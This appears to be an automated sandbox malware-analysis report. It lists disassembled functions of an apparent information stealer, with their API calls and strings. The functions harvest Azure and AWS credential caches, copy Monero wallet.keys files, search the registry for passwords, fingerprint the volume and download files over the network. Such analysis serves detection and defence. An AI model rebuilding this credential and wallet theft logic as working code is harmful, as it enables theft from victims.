Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 507064821-2791005934
Opcode ID: 214cc792f425a2b0fa6be0564415fb64f3cc5c60ddb510e48295cdbec0f623f5
Instruction ID: 6e7ed5c4d73425538f3677a0ae23a2bed6add955526a5374022670ffe8b8f4d7
Opcode Fuzzy Hash: 214cc792f425a2b0fa6be0564415fb64f3cc5c60ddb510e48295cdbec0f623f5
Instruction Fuzzy Hash: 50E143719101049BEB58FBA4DC96AFE7338FB55300F408129B417D6D91EF386A4ACB93

Function 008A4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008A8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 008A8E0B

lstrcat.KERNEL32(?,00000000), ref: 008A4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 008A4DCD

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A492C
Part of subcall function 008A4910: FindFirstFileA.KERNEL32(?,?), ref: 008A4943

lstrcat.KERNEL32(?,00000000), ref: 008A4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 008A4E59

Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FDC), ref: 008A4971
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B0FE0), ref: 008A4987
Part of subcall function 008A4910: FindNextFileA.KERNEL32(000000FF,?), ref: 008A4B7D
Part of subcall function 008A4910: FindClose.KERNEL32(000000FF), ref: 008A4B92

lstrcat.KERNEL32(?,00000000), ref: 008A4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 008A4EE5

Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49B0
Part of subcall function 008A4910: StrCmpCA.SHLWAPI(?,008B08D2), ref: 008A49C5
Part of subcall function 008A4910: wsprintfA.USER32 ref: 008A49E2
Part of subcall function 008A4910: PathMatchSpecA.SHLWAPI(?,?), ref: 008A4A1E
Part of subcall function 008A4910: lstrcat.KERNEL32(?,0156E590), ref: 008A4A4A
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FF8), ref: 008A4A5C
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A70
Part of subcall function 008A4910: lstrcat.KERNEL32(?,008B0FFC), ref: 008A4A82
Part of subcall function 008A4910: lstrcat.KERNEL32(?,?), ref: 008A4A96
Part of subcall function 008A4910: CopyFileA.KERNEL32(?,?,00000001), ref: 008A4AAC
Part of subcall function 008A4910: DeleteFileA.KERNEL32(?), ref: 008A4B31

Strings

\.IdentityService\, xrefs: 008A4ED9
*.*, xrefs: 008A4E64
Azure\.aws, xrefs: 008A4E5F
msal.cache, xrefs: 008A4EF0
Azure\.IdentityService, xrefs: 008A4EEB
\.azure\, xrefs: 008A4DC1
\.aws\, xrefs: 008A4E4D
*.*, xrefs: 008A4DD8
Azure\.azure, xrefs: 008A4DD3

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 949356159-974132213
Opcode ID: 7eef6f60e5f977520a329b752a8f346ad9d73553cea0b0779bac26ca1927516b
Instruction ID: 5ce0b4d62f541f4ed88a0b86ce6f77c0f3565a7a187f4f4b78f92066403cc683
Opcode Fuzzy Hash: 7eef6f60e5f977520a329b752a8f346ad9d73553cea0b0779bac26ca1927516b
Instruction Fuzzy Hash: 23417F7A94020467DB54F770DC9BFDD3338FB64700F404454B646A66C1EEB89B8A8B93

Function 00891310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008912A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 008912B4
Part of subcall function 008912A0: RtlAllocateHeap.NTDLL(00000000), ref: 008912BB
Part of subcall function 008912A0: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 008912D7
Part of subcall function 008912A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 008912F5
Part of subcall function 008912A0: RegCloseKey.ADVAPI32(?), ref: 008912FF

lstrcat.KERNEL32(?,00000000), ref: 0089134F
lstrlen.KERNEL32(?), ref: 0089135C
lstrcat.KERNEL32(?,.keys), ref: 00891377

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Part of subcall function 008AA9B0: lstrlen.KERNEL32(?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008AA9C5
Part of subcall function 008AA9B0: lstrcpy.KERNEL32(00000000), ref: 008AAA04
Part of subcall function 008AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 008AAA12

Part of subcall function 008AA8A0: lstrcpy.KERNEL32(?,008B0E17), ref: 008AA905

Part of subcall function 008A8B60: GetSystemTime.KERNEL32(008B0E1A,0156A038,008B05AE,?,?,008913F9,?,0000001A,008B0E1A,00000000,?,015689F0,?,\Monero\wallet.keys,008B0E17), ref: 008A8B86

Part of subcall function 008AA920: lstrcpy.KERNEL32(00000000,?), ref: 008AA972
Part of subcall function 008AA920: lstrcat.KERNEL32(00000000), ref: 008AA982

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00891465

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008999C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008999EC
Part of subcall function 008999C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00899A11
Part of subcall function 008999C0: LocalAlloc.KERNEL32(00000040,?), ref: 00899A31
Part of subcall function 008999C0: ReadFile.KERNEL32(000000FF,?,00000000,0089148F,00000000), ref: 00899A5A
Part of subcall function 008999C0: LocalFree.KERNEL32(0089148F), ref: 00899A90
Part of subcall function 008999C0: CloseHandle.KERNEL32(000000FF), ref: 00899A9A

DeleteFileA.KERNEL32(00000000), ref: 008914EF

Strings

\Monero\wallet.keys, xrefs: 0089138D
.keys, xrefs: 0089136B
wallet_path, xrefs: 00891330
SOFTWARE\monero-project\monero-core, xrefs: 00891335

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 3478931302-218353709
Opcode ID: 2d0e829d2a85c5033e62997b9604679af5b1e482e500cab02186aeec86c174ed
Instruction ID: 1177bbd7202a3974ef221eb8fda11321f12b114e2050781096d66f69f7e69b65
Opcode Fuzzy Hash: 2d0e829d2a85c5033e62997b9604679af5b1e482e500cab02186aeec86c174ed
Instruction Fuzzy Hash: 0E5173B19501195BDB59FB64DC92BEE733CFB10300F4041A8B60AE2481EF346B86CAA7

Function 008975D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON

Download Yara Rule

APIs

Part of subcall function 008972D0: RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0089733A
Part of subcall function 008972D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008973B1
Part of subcall function 008972D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0089740D
Part of subcall function 008972D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00897452
Part of subcall function 008972D0: HeapFree.KERNEL32(00000000), ref: 00897459

lstrcat.KERNEL32(35CE6020,008B17FC), ref: 00897606
lstrcat.KERNEL32(35CE6020,00000000), ref: 00897648
lstrcat.KERNEL32(35CE6020, : ), ref: 0089765A
lstrcat.KERNEL32(35CE6020,00000000), ref: 0089768F
lstrcat.KERNEL32(35CE6020,008B1804), ref: 008976A0
lstrcat.KERNEL32(35CE6020,00000000), ref: 008976D3
lstrcat.KERNEL32(35CE6020,008B1808), ref: 008976ED
task.LIBCPMTD ref: 008976FB

Strings

: , xrefs: 0089764E

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
String ID: :
API String ID: 2677904052-3653984579
Opcode ID: 98fa88fb2617673d0405095edbdfad21ff727a85a39340686e2c2409ce1613ea
Instruction ID: 93a56a2e036bcca0ae5a00f8093626ff5d2a3de7a62097b7bd439644a13a6223
Opcode Fuzzy Hash: 98fa88fb2617673d0405095edbdfad21ff727a85a39340686e2c2409ce1613ea
Instruction Fuzzy Hash: 1B313672A01109DBCF08FBF8DC99DFE7378FB65301B184119E512E72A0DA34A946DB62

Function 008A7500 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 008A7542
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 008A757F
GetProcessHeap.KERNEL32(00000000,00000104), ref: 008A7603
RtlAllocateHeap.NTDLL(00000000), ref: 008A760A
wsprintfA.USER32 ref: 008A7640

Part of subcall function 008AA740: lstrcpy.KERNEL32(008B0E17,00000000), ref: 008AA788

Strings

C, xrefs: 008A754C
\, xrefs: 008A7560
:, xrefs: 008A755C

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 1544550907-3809124531
Opcode ID: 38cfae40e138237a6a2827b2ce01033947958efbf17837b63ca0e159fc112824
Instruction ID: 2fc9146fccfff8c499c616420d0d2c8d9a125f38aa3df4a1e1c23df54713cdd5
Opcode Fuzzy Hash: 38cfae40e138237a6a2827b2ce01033947958efbf17837b63ca0e159fc112824
Instruction Fuzzy Hash: FB4185B1D04248EBEB10DF98DC45BEEB7B8FF19704F100199F506A7680D7786A44CBA6

Function 008960A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 008AA7A0: lstrcpy.KERNEL32(?,00000000), ref: 008AA7E6

Part of subcall function 008947B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00894839
Part of subcall function 008947B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00894849

InternetOpenA.WININET(008B0DF7,00000001,00000000,00000000,00000000), ref: 0089610F
StrCmpCA.SHLWAPI(?,0156E4F0), ref: 00896147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0089618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 008961B3
InternetReadFile.WININET(?,?,00000400,?), ref: 008961DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0089620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00896249
InternetCloseHandle.WININET(?), ref: 00896253
InternetCloseHandle.WININET(00000000), ref: 00896260

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000ADA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000AEE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D6C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D73000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273816620.0000000000D82000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274101961.0000000000D83000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274236015.0000000000F15000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2274255034.0000000000F16000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_890000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
String ID:
API String ID: 2507841554-0
Opcode ID: ce3a5274d5c89ccc9eb3dc32ae5225d9f4d9cdc473f74a3f1a472a41e4c9b1c9
Instruction ID: 914d8f66f4741ba607c6b14169307ce42ede1e563aa6811648971946abf9b88a
Opcode Fuzzy Hash: ce3a5274d5c89ccc9eb3dc32ae5225d9f4d9cdc473f74a3f1a472a41e4c9b1c9
Instruction Fuzzy Hash: 9A517571900218ABDF24EF90DC45BEE77B8FB44705F148099B606E71C0EB746A85CF56

Function 008972D0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 149registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNEL32(80000001,?,00000000,00020019,?), ref: 0089733A
RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 008973B1
StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0089740D
GetProcessHeap.KERNEL32(00000000,?), ref: 00897452
HeapFree.KERNEL32(00000000), ref: 00897459
task.LIBCPMTD ref: 00897555

Strings

Password, xrefs: 00897401

Memory Dump Source

Source File: 00000000.00000002.2273166717.0000000000891000.00000040.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true

Associated: 00000000.00000002.2273147709.0000000000890000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000008EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000915000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000918000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000091F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000922000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000941000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000094D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000972000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000097F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.000000000099F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.00000000009AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2273166717.0000000000A5B000.00000040.00000001.01000000.00000003.sdmpDownload File
